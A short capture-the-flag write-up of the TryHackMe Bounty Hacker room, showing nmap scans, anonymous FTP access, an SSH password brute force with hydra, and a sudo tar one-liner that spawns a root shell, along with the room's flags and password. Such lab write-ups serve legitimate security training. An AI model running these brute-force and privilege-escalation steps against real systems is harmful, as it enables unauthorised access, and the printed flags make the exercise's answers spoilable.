TryHackMe: Bounty Hacker CTF
Hello everyone, this is a simple and straightforward writeup on how I completed the TryHackMe | Bounty Hacker CTF.
You can find the room here.
After deploying the machine, we run an nmap scan against the target IP. I usually like to do a null scan first.
nmap -sN <TARGET_IP>
Output:
No results. We next move to the SYN scan.
nmap -sS -sV <TARGET_IP>
We found three open ports. Awesome !!
We anonymously login on the ftp port using the following command and enter the Name as ‘anonymous’ when prompted:
ftp <TARGET_IP>
We then list all the files and get them on our local machine.
ftp> ls
ftp> get locks.txt
ftp> get tasks.txt
We then look at the contents of tasks.txt
So after exiting out of ftp,
cat task.txt
Output:
Q. Who wrote the task list?
Ans: lin
Q. Next, what service can we bruteforce with the textfile found?
Ans: ssh
Since there is only one other port aside ftp and that is ‘ssh’.
Now we get a rough idea of who the user might be (i.e lin)
So lets use this information and the file locks.txt which looks like a password list to bruteforce into ssh.
We will be using hydra for this
hydra -l lin -P locks.txt <TARGET_IP> ssh
Output:
Q. What is the users password?
Ans. RedDr4gonSynd1cat3
Now that we have the credentials, lets ssh into the system.
ssh lin@<TARGET_IP>
Q. user.txt
Ans: THM{CR1M3_SyNd1C4T3}
Now we need to escalate our privileges to look for the root flag.
To do so, we will be running the following command to check the list of commands lin can run with sudo
sudo -l
Output:
Next, we head to gtfobins.github.io and check if we can spawn a root shell using the tar command.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
After running the above command, a root shell is spawned and we now have access to the root flag
Q. root.txt
Ans: THM{80UN7Y_h4cK3r}